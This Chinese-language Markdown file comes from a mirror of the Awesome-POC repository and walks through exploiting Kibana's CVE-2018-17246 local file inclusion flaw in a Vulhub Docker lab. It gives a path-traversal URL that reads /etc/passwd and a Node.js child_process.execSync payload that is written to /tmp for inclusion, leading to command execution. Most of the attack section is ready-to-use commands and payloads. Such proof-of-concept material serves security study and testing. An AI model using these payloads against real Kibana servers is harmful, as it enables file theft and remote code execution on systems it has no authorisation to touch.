admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Kibana 本地文件包含漏洞 CVE-2018-17246.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

55 lines
1.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Kibana 本地文件包含漏洞 CVE-2018-17246
## 漏洞描述
Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。
参考链接:
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
- https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/
- https://www.anquanke.com/post/id/168291
## 环境搭建
Vulhub启动 Kibana 5.6.12 和 Elasticsearch 5.6.16 环境:
```
docker-compose up -d
```
环境启动后,访问`http://your-ip:5601`即可看到Kibana的默认首页。
![image-20220224201606864](images/202202242016950.png)
## 漏洞复现
直接访问如下URL来包含文件`/etc/passwd`
```
http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
```
虽然在返回的数据包里只能查看到一个500的错误信息但是我们通过执行`docker-compose logs`即可发现,`/etc/passwd`已经成功被包含:
![image-20220224201853518](images/202202242018849.png)
所以,我们需要从其他途径往服务器上上传代码,再进行包含从而执行任意命令。比如,我们可以将如下代码上传到服务器的`/tmp/vulhub.js`,文件内容为:
```
export default {asJson: function() {return require("child_process").execSync("id").toString()}}
```
首先进入docker
```
docker-compose exec kibana bash
```
在docker内写入文件
```
echo 'export default {asJson: function() {return require("child_process").execSync("id").toString()}}' > /tmp/vulhub.js
```
![image-20220224202447963](images/202202242024051.png)
Reference in New Issue View Git Blame Copy Permalink